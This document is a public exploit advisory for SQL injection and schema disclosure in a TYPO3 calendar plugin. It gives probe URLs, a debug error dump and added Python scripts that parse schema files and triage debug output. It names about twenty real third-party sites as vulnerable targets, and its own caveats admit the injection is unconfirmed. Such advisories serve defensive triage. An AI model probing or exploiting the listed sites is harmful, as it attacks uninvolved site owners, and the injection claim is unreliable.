- ###################################################################################
- # Exploit Title : Typo3 Calendar Base tx_pxkalender_pi1 2.0.0 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/02/2019
- # Vendor Homepage : typo3.org
- # Software Download Link : extensions.typo3.org/extension/download/cal/2.0.0/zip/
- # Software Information Link : extensions.typo3.org/extension/cal/
- # Software Version : 0.7.0 through 2.0.0 (all releases)
- # TYPO3 Compatibility : as declared per release on TER (release labels: Free, Stable, Alpha, Experimental):
- 3.8.0 - 4.3.99, 8.7.99 - 9.5.99, 6.1.0 - 8.9.99,
- 6.2.0 - 6.2.99, 6.1.0 - 6.2.99, 4.5.5 - 6.0.99
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################################
- # Description about Software :
- ***************************
- A calendar combining all the functions of the existing calendar
- extensions plus adding some new features. It is based on the ical standard.
- ###################################################################################
- # Impact :
- ***********
- The tx_pxkalender_pi1 frontend plugin of the TYPO3 calendar extension named above (2.0.0 and the other listed versions)
- builds an SQL query from request parameters without sufficiently validating them. Appending a single quote to the
- id parameter of a single-event request (tx_pxkalender_pi1[termin]) makes the plugin's page lookup by UID list
- (model_getAbteilungenByUidList in the backtrace below) fail with a syntax error. On installations that run with
- TYPO3's SQL debugging switched on (SYS[sqlDebug], which makes DatabaseConnection::debug() print on every failed
- query), the page then returns the full debug dump: the failing query, the MariaDB/MySQL error text and a PHP
- backtrace naming the extension class and method that built the query.
- Caveat: in the dump reproduced below the failing query contains an empty list, uid IN (), not the injected quote.
- What this page demonstrates is therefore unhandled input plus verbose error disclosure (query text, table and
- column names, extension internals); it does not by itself show attacker-controlled text being concatenated into
- the query. Confirm reading or writing of data with a controlled probe before reporting this as more than
- information disclosure. Also check that the target actually ships the tx_pxkalender_pi1 class, since the
- parameter name and backtrace belong to that plugin while the download link above points at the cal extension.
- If injection is confirmed, the impact is the usual one for CWE-89: reading or modifying application data and
- reaching any latent weaknesses in the underlying database server, all from a browser.
- ###################################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?L=[ID-NUMBER]&tx_pxkalender_pi1%5Btermin%5D=[ID-NUMBER]&id=[SQL Injection]
- (probe: a valid page id with a single quote appended; the response shown under "Example SQL Database Error"
- below is the signature of an affected, debug-enabled install)
- /typo3conf/ext/cal/res/PEAR/Date/TimeZone.php?id=[SQL Injection]
- (a bundled PEAR library file; no error output for this path is given on this page, so treat it as unverified)
- # Database Disclosure Exploit :
- **************************
- /typo3conf/ext/cal/ext_tables.sql
- (this is the extension's schema file: CREATE TABLE statements only, no row data, and the same file is in the
- public extension archive linked above. Reading it confirms that the cal extension is installed and gives its
- table and column names for use in later queries; it does not expose database contents.)
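To make concrete what a readable ext_tables.sql actually hands an attacker, here is an added example (not part of the original advisory) that parses a file in that format and reports the tables, columns and implied extension keys, and checks that the file really is structure only. SAMPLE_SCHEMA is constructed in the style of a TYPO3 ext_tables.sql with placeholder names; it is not the cal extension's real schema.

```python
"""Summarise a TYPO3 ext_tables.sql schema file.

Added example, not from the advisory. SAMPLE_SCHEMA is a constructed
file in ext_tables.sql style; tx_example_* are placeholder names.
"""
import re
from typing import Dict, List

# One CREATE TABLE statement: name plus the column/index body. The body
# contains parentheses (int(11), KEY x (col)), so the match is anchored on
# the closing ")" that is followed by ";" or an ENGINE clause.
_CREATE_RE = re.compile(
    r"CREATE\s+TABLE\s+`?(\w+)`?\s*\((.*?)\)\s*(?:ENGINE\b|;)", re.I | re.S
)
# Index/constraint lines inside the body, which are not columns.
_INDEX_RE = re.compile(r"(PRIMARY|UNIQUE|FULLTEXT|KEY|INDEX|CONSTRAINT)\b", re.I)


def parse_ext_tables(sql: str) -> Dict[str, List[str]]:
    """Map each CREATE TABLE to its column names, in declaration order."""
    tables: Dict[str, List[str]] = {}
    for m in _CREATE_RE.finditer(sql):
        cols: List[str] = []
        for line in m.group(2).splitlines():
            line = line.strip().rstrip(",")
            if not line or line.startswith(("#", "--")) or _INDEX_RE.match(line):
                continue
            cols.append(line.split()[0].strip("`"))
        tables[m.group(1)] = cols
    return tables


def extension_keys(tables: Dict[str, List[str]]) -> List[str]:
    """Extension keys implied by TYPO3's tx_<key>_<table> naming convention."""
    keys = set()
    for name in tables:
        m = re.match(r"tx_([a-z0-9]+)_", name)
        if m:
            keys.add(m.group(1))
    return sorted(keys)


def is_schema_only(sql: str) -> bool:
    """True when the file defines structure only (no INSERT/REPLACE/LOAD DATA)."""
    return re.search(r"^\s*(INSERT|REPLACE|LOAD\s+DATA)\b", sql, re.I | re.M) is None


# Constructed sample, placeholder names (not the real cal schema).
SAMPLE_SCHEMA = """
# Table structure for table 'tx_example_event'
CREATE TABLE tx_example_event (
  uid int(11) unsigned NOT NULL auto_increment,
  pid int(11) unsigned DEFAULT '0' NOT NULL,
  tstamp int(11) unsigned DEFAULT '0' NOT NULL,
  hidden tinyint(4) unsigned DEFAULT '0' NOT NULL,
  title tinytext,
  keywords text,
  start_date int(11) unsigned DEFAULT '0' NOT NULL,
  organizer_id int(11) unsigned DEFAULT '0' NOT NULL,
  PRIMARY KEY (uid),
  KEY parent (pid)
);

CREATE TABLE tx_example_organizer (
  uid int(11) unsigned NOT NULL auto_increment,
  pid int(11) unsigned DEFAULT '0' NOT NULL,
  name tinytext,
  PRIMARY KEY (uid)
);

# Extension adds a column to a core table
CREATE TABLE pages (
  tx_example_enabled tinyint(4) DEFAULT '0' NOT NULL
);
"""

if __name__ == "__main__":
    tables = parse_ext_tables(SAMPLE_SCHEMA)
    print("schema only:", is_schema_only(SAMPLE_SCHEMA))
    print("extension keys:", extension_keys(tables))
    for name, cols in tables.items():
        print(f"{name}: {', '.join(cols)}")
```

Run against a fetched file, the output is a fingerprint (which extension, which release by its column set) plus the identifiers an injection would later need; the absence of INSERT statements is the check that nothing beyond structure leaked.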
- ###################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] klinikverbund-suedwest.de/index.php?L=0&tx_pxkalender_pi1%5Btermin%5D=2511&id=3084%27
- [+] creation-willigeller.com/typo3conf/ext/cal/ext_tables.sql
- [+] kupferdreh.com/typo3conf/ext/cal/ext_tables.sql
- [+] cyfra7.com/typo3conf/ext/cal/ext_tables.sql
- [+] maska.si/typo3conf/ext/cal/ext_tables.sql
- [+] belasso.de/typo3conf/ext/cal/ext_tables.sql
- [+] usk-anif.at/typo3conf/ext/cal/ext_tables.sql
- [+] emergegroup.com/typo3conf/ext/cal/ext_tables.sql
- [+] von-buelow-gymnasium.de/typo3conf/ext/cal/ext_tables.sql
- [+] jammertrust.org/typo3conf/ext/cal/ext_tables.sql
- [+] mittelhofschule-ellwangen.de/typo3conf/ext/cal/ext_tables.sql
- [+] radinfo.at/typo3conf/ext/cal/ext_tables.sql
- [+] betriebsratspraxis24.de/typo3conf/ext/cal/ext_tables.sql
- [+] gemeinde-gaiberg.de/typo3conf/ext/cal/ext_tables.sql
- [+] provincia.livorno.it/typo3conf/ext/cal/ext_tables.sql
- [+] bnr.rw/typo3conf/ext/cal/ext_tables.sql
- [+] sankt-josef.de/typo3conf/ext/cal/ext_tables.sql
- [+] foto-on-line.pl/typo3conf/ext/cal/ext_tables.sql
- [+] versicherungspraxis24.de/typo3conf/ext/cal/ext_tables.sql
- ###################################################################################
- # Example SQL Database Error :
- ****************************
- array(4 items)
-    caller => 'TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery' (60 chars)
-    ERROR => 'You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') AND pages.deleted=0 AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidde' at line 1' (228 chars)
-    lastBuiltQuery => 'SELECT * FROM pages WHERE 1 AND uid IN () AND pages.deleted=0 AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidden=0 AND pages.starttime<=1550510640 AND (pages.endtime=0 OR pages.endtime>1550510640) AND (pages.fe_group='' OR pages.fe_group IS NULL OR pages.fe_group='0' OR FIND_IN_SET('0',pages.fe_group) OR FIND_IN_SET('-1',pages.fe_group))' (348 chars)
-    debug_backtrace => 'call_user_func#34 // {closure}# // TYPO3\CMS\Frontend\Http\Application->run#33 // TYPO3\CMS\Core\Core\Bootstrap->handleRequest#78 // TYPO3\CMS\Frontend\Http\RequestHandler->handleRequest#307 // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->INTincScript#232 // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->recursivelyReplaceIntPlaceholdersInContent#3488 // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->INTincScript_process#3522 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#3577 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->render#859 // TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#943 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#40 // call_user_func_array#7316 // tx_pxkalender_pi1->main# // tx_pxkalender_pi1->getSingleTermin#263 // tx_pxkalender_pi1->model_getAbteilungenByUidList#335 // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#300 // TYPO3\CMS\Core\Database\DatabaseConnection->debug#314' (1043 chars)
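The dump above is the output of TYPO3's DatabaseConnection::debug() (TYPO3 6.2 to 8.7, printed when SYS[sqlDebug] is on): caller, ERROR, lastBuiltQuery and debug_backtrace. The useful triage question is whether the probe text actually reached the SQL. The following added example (not part of the advisory) parses such a dump, separates a reflected probe from a stripped one or a properly escaped one, and names the extension method that built the failing query. SAMPLE_DUMP is reconstructed from the advisory's dump with the backtrace abridged; REFLECTED_DUMP is a constructed counterexample with placeholder class names, not observed output.

```python
"""Triage a TYPO3 SQL debug dump (DatabaseConnection::debug() output).

Added example, not from the advisory. SAMPLE_DUMP is reconstructed from
the advisory text (backtrace abridged); REFLECTED_DUMP is constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SQL_SYNTAX_ERROR = "You have an error in your SQL syntax"

# One "key => 'value' (N chars)" entry of the DebugUtility array dump.
# Values contain single quotes, so the non-greedy match is terminated by
# the "' (N chars)" suffix TYPO3 appends to every string entry.
_FIELD_RE = re.compile(
    r"^\s*(caller|ERROR|lastBuiltQuery|debug_backtrace)\s*=>\s*'(.*?)'\s*\(\d+ chars\)",
    re.M | re.S,
)
_EMPTY_IN_RE = re.compile(r"\bIN\s*\(\s*\)", re.I)


@dataclass
class DebugDump:
    caller: str
    error: str
    last_built_query: str
    backtrace: List[str]


def parse_debug_dump(body: str) -> Optional[DebugDump]:
    """Return the dump fields, or None if the body is not a TYPO3 SQL debug dump."""
    fields = {m.group(1): m.group(2) for m in _FIELD_RE.finditer(body)}
    if not {"caller", "ERROR", "lastBuiltQuery"} <= set(fields):
        return None
    frames = [f.strip() for f in fields.get("debug_backtrace", "").split("//") if f.strip()]
    return DebugDump(fields["caller"], fields["ERROR"], fields["lastBuiltQuery"], frames)


def extension_frame(dump: DebugDump) -> Optional[str]:
    """Innermost frame outside TYPO3 core and PHP callbacks: the extension
    method that built the failing query."""
    for frame in reversed(dump.backtrace):
        if frame.startswith("TYPO3\\CMS\\") or frame.startswith(("call_user_func", "{closure}")):
            continue
        return frame
    return None


def classify(dump: DebugDump, probe: str) -> str:
    """escaped:   probe reached the query but quoted/escaped (not injectable here)
    reflected: probe text is inside lastBuiltQuery verbatim (injection evidence)
    sanitised: syntax error but probe absent (input stripped; disclosure only)
    other:     a database error unrelated to the probe"""
    escaped = probe.replace("\\", "\\\\").replace("'", "\\'")
    if escaped != probe and escaped in dump.last_built_query:
        return "escaped"
    if probe in dump.last_built_query:
        return "reflected"
    if SQL_SYNTAX_ERROR in dump.error:
        return "sanitised"
    return "other"


def triage(body: str, probe: str) -> Dict[str, object]:
    """Summarise one HTTP response body for the probe string that was sent."""
    dump = parse_debug_dump(body)
    if dump is None:
        return {"debug_dump": False}
    return {
        "debug_dump": True,
        "verdict": classify(dump, probe),
        "empty_in_list": bool(_EMPTY_IN_RE.search(dump.last_built_query)),
        "extension_frame": extension_frame(dump),
        "query": dump.last_built_query,
    }


# Reconstructed from the advisory's dump; backtrace abridged to the relevant frames.
SAMPLE_DUMP = r"""array(4 items)
   caller => 'TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery' (60 chars)
   ERROR => 'You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') AND pages.deleted=0 AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidde' at line 1' (228 chars)
   lastBuiltQuery => 'SELECT * FROM pages WHERE 1 AND uid IN () AND pages.deleted=0 AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidden=0 AND pages.starttime<=1550510640 AND (pages.endtime=0 OR pages.endtime>1550510640) AND (pages.fe_group='' OR pages.fe_group IS NULL OR pages.fe_group='0' OR FIND_IN_SET('0',pages.fe_group) OR FIND_IN_SET('-1',pages.fe_group))' (348 chars)
   debug_backtrace => 'call_user_func#34 // {closure}# // TYPO3\CMS\Frontend\Http\Application->run#33 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#40 // call_user_func_array#7316 // tx_pxkalender_pi1->main# // tx_pxkalender_pi1->getSingleTermin#263 // tx_pxkalender_pi1->model_getAbteilungenByUidList#335 // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#300 // TYPO3\CMS\Core\Database\DatabaseConnection->debug#314' (1043 chars)
"""

# Constructed counterexample (placeholder class names): the probe survives into the SQL.
REFLECTED_DUMP = r"""array(4 items)
   caller => 'TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery' (60 chars)
   ERROR => 'You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') AND pages.deleted=0' at line 1' (150 chars)
   lastBuiltQuery => 'SELECT * FROM pages WHERE 1 AND uid IN (3084') AND pages.deleted=0' (67 chars)
   debug_backtrace => 'tx_example_pi1->main# // tx_example_pi1->listByUid#12 // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#300 // TYPO3\CMS\Core\Database\DatabaseConnection->debug#314' (170 chars)
"""

if __name__ == "__main__":
    for name, body in (("advisory dump", SAMPLE_DUMP), ("constructed dump", REFLECTED_DUMP)):
        print(name, triage(body, "3084'"))
```

Feed it the body returned for the probe request and for a request with a valid id; only "reflected" on the probe is evidence for CWE-89, while "sanitised" with an empty IN () list (the advisory's case) is verbose error disclosure and the cue to look at how the plugin filters the list before reporting anything stronger.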
- ###################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################################